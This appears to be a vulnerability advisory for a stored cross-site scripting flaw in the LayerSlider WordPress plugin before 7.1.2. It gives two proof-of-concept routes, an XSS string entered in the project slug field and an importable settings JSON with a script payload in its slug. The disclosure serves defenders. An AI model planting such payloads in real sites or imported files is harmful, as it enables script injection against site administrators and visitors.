WordPress Plugin Vulnerabilities

LayerSlider < 7.1.2 - Admin+ Stored Cross-Site Scripting

Description

The plugin does not sanitise and escape Project's slug before outputting it back in various place, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html is disallowed

Proof of Concept

Proof of Concept  (PoC):
=======================
1.) The stored XSS is done in the template slug of any slider, a javascript payload is added to the SLUG input, which stores the malicious script executing the payload during the reopening of the template or when accessing different functions of the slider.

2.) The vulnerability also allows loading a configuration file (settings.json) with the malicious payload allowing it to be executed within the Slider edition.

## POC1: via (slug slider) 

1.) Add new project & Put Name
2.) Create Blank Project
3.) Project Settings & Tab Publish
4.) Add malicious code in the SLUG: "><img src onerror=alert(/XSS/)>
5.) Exit
6.) Save Project 
7.) XSS will trigger when accessing the project again for example (there seem to be other place when its triggered as well, like in the Project's settings)


## POC2 via (file,json)

1.) Add new post & Create Blank Project
2.) Import Projects
3.) Load file.json

{"properties":{"sliderVersion":"7.x","title":"Via Json","slug":"\">'><details\/open\/ontoggle=confirm('XSS')>","status":true,"schedule_start":"","schedule_end":"","type":"responsive","popupFitWidth":"","popupFitHeight":"","popupPositionHorizontal":"center","popupPositionVertical":"middle","popupWidth":"640","popupHeight":"360","popupDistanceTop":"10","popupDistanceRight":"10","popupDistanceBottom":"10","popupDistanceLeft":"10","popupShowOnTimeout":"","popupShowOnIdle":"","popupShowOnScroll":"","popupShowOnClick":"","popupCloseOnTimeout":"","popupCloseOnScroll":"","popup_repeat":true,"popup_repeat_days":"","popupShowOnce":true,"popup_pages_custom":"","popup_pages_exclude":"","popup_roles_administrator":true,"popup_roles_editor":true,"popup_roles_author":true,"popup_roles_contributor":true,"popup_roles_subscriber":true,"popup_roles_customer":true,"popup_roles_visitor":true,"popupTransitionIn":"fade","popupDurationIn":"1000","popupDelayIn":"200","popupTransitionOut":"fade","popupDurationOut":"500","popupResetOnClose":"slide","popupShowCloseButton":true,"popupCloseButtonStyle":"","popupOverlayClickToClose":true,"popupOverlayBackground":"rgba(0,0,0,.85)","popupOverlayTransitionIn":"fade","popupOverlayDurationIn":"400","popupOverlayTransitionOut":"fade","popupOverlayDurationOut":"400","width":1280,"height":720,"maxwidth":"","responsiveunder":"","fullSizeMode":"normal","fitScreenWidth":true,"allowFullscreen":true,"maxRatio":"","insertMethod":"prependTo","insertSelector":"","clipSlideTransition":"disabled","preventSliderClip":true,"hideunder":"","hideover":"","slideOnSwipe":true,"optimizeForMobile":true,"firstlayer":"1","autostart":true,"startinviewport":true,"pauseonhover":"disabled","keybnav":true,"touchnav":true,"playByScrollSpeed":"1","loops":"0","forceloopnum":true,"skin":"v6","sliderfadeinduration":"350","sliderclass":"","sliderstyle":"margin-bottom: 0px;","backgroundcolor":"","globalBGRepeat":"no-repeat","globalBGAttachment":"scroll","globalBGPosition":"50% 50%","globalBGSize":"auto","navprevnext":true,"navstartstop":true,"navbuttons":true,"hoverprevnext":true,"circletimer":true,"thumb_nav":"hover","thumb_container_width":"60%","thumb_width":"100","thumb_height":"60","thumb_active_opacity":"35","thumb_inactive_opacity":"100","autoplayvideos":true,"rememberUnmuteState":true,"autopauseslideshow":"auto","youtubepreview":"maxresdefault.jpg","slideBGSize":"cover","slideBGPosition":"50% 50%","parallaxSensitivity":"10","parallaxCenterLayers":"center","parallaxCenterDegree":"40","forceLayersOutDuration":"750","useSrcset":"inherit","enhancedLazyLoad":"inherit","preferBlendMode":"disabled","createdWith":"7.0.7"},"layers":[{"properties":{"post_offset":-1,"3d_transitions":"","2d_transitions":"","custom_3d_transitions":"","custom_2d_transitions":"","bgcolor":"","bgposition":"inherit","bgsize":"inherit","slidedelay":"","timeshift":0,"transitionduration":"","kenburnszoom":"disabled","kenburnsscale":1.2,"kenburnsrotate":"","globalhover":false,"parallaxtype":"2d","parallaxevent":"cursor","parallaxaxis":"both","parallaxdistance":10,"parallaxrotate":10,"parallaxdurationmove":1500,"parallaxdurationleave":1200,"parallaxtransformorigin":"50% 50% 0","parallaxtransformperspective":500,"layer_link":"","linkId":"","linkName":"","linkType":"","layer_link_target":"_self","layer_link_type":"over","deeplink":"","overflow":false,"customProperties":[],"post_content":false,"schedule_start":"","schedule_end":""},"sublayers":[],"meta":{"undoStackIndex":-1},"history":[]}]}